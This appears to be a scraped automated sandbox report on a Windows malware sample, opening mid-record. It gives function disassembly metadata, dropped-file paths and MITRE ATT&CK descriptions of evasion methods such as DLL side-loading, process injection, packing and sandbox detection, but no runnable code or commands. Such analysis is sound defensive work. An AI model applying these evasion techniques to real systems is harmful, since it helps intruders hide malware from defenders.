, xrefs: 00ED5BE0

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: char_traitscodecvt
String ID:
API String ID: 1910604377-3916222277
Opcode ID: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
Instruction ID: b9a60f9c758854e07df8bf06cda07a51aa645a9d1404563992b0a214d12e8add
Opcode Fuzzy Hash: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
Instruction Fuzzy Hash: 80315972914208EFCB04CB94C594AEEB7F5EF44304F24A19AD4127B341D730AE46EB90

Function 00ED6890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED72B0: _Max_value.LIBCPMTD ref: 00ED72DC
Part of subcall function 00ED72B0: _Min_value.LIBCPMTD ref: 00ED7302

_Min_value.LIBCPMTD ref: 00ED6928
allocator.LIBCONCRTD ref: 00ED693F

Part of subcall function 00ED7440: _Allocate.LIBCONCRTD ref: 00ED7454

Strings

;S, xrefs: 00ED68B3, 00ED6901, 00ED690C

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Min_value$AllocateMax_valueallocator
String ID: ;S
API String ID: 1398198560-3176674333
Opcode ID: 7d26b022a18fc2e0bf1e5838485797304f808408736efc7a268a1e21f31a8dbc
Instruction ID: 09354a87805d847a2f3d4adbb5635854a0814dfb1d805ce059d46a61b83e90f7
Opcode Fuzzy Hash: 7d26b022a18fc2e0bf1e5838485797304f808408736efc7a268a1e21f31a8dbc
Instruction Fuzzy Hash: A73137B5D04209AFCF04DFA8D8819EEBBB5FF48300F1085AAE445B7341D735AA46CBA1

Function 00ED7FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED72B0: _Max_value.LIBCPMTD ref: 00ED72DC
Part of subcall function 00ED72B0: _Min_value.LIBCPMTD ref: 00ED7302

allocator.LIBCONCRTD ref: 00ED8018
allocator.LIBCONCRTD ref: 00ED806D

Part of subcall function 00ED1550: std::_Xinvalid_argument.LIBCPMT ref: 00ED1558

Strings

Bg, xrefs: 00ED803A, 00ED803D

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
String ID: Bg
API String ID: 3868691235-919853397
Opcode ID: 70ddc874a7278e7c469e8ddfaf7d9822cffd6cb4d35698cadb0e0e837ea844f0
Instruction ID: 4d5a64a181b70eb9d605d4320b3bc2416a5f07581fbae7faa3e629ff6f95d57b
Opcode Fuzzy Hash: 70ddc874a7278e7c469e8ddfaf7d9822cffd6cb4d35698cadb0e0e837ea844f0
Instruction Fuzzy Hash: E221D8B4A00108EFCB04EF98D9818AEB7F5EF88304B20919AE415B7355DB30AF41DB91

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002B_246.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Everything\4.bin

C:\Program Files (x86)\Everything\Everything.exe

C:\Program Files (x86)\Everything\app_core_legacy.dll

C:\Program Files (x86)\Everything\msvcp120.dll

C:\Program Files (x86)\Everything\msvcp140.dll

C:\Program Files (x86)\Everything\msvcr120.dll

C:\Program Files (x86)\Everything\vcruntime140.dll

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LisectAVT_240300_5d9c73d78c4262b74a2a23681a113041a823c279_fe420846_b4747013-6ef0-4cc8-95bf-59303275033e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER677C.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BF2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C31.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dll

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
LisectAVT_2403002B_246.exe

Function 00ED3150 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 223
networksleepfileCOMMON

Function 00ED2EE0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 137
COMMON

Function 00EF427E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 00ED2CB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104
networkfileCOMMON

Function 00EE9DED Relevance: 9.3, APIs: 6, Instructions: 292
COMMONLIBRARYCODE

Function 00ED34B0 Relevance: 6.0, APIs: 4, Instructions: 19
sleepCOMMON

Function 00ED3E50 Relevance: 4.6, APIs: 3, Instructions: 120
COMMON

Function 00EE91F2 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 157
COMMON

Function 00ED2B40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108
COMMON

Function 00ED7DB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Function 00EF3F37 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Function 00EE70F5 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00EE65B0 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00EEA29D Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Function 00EE7311 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE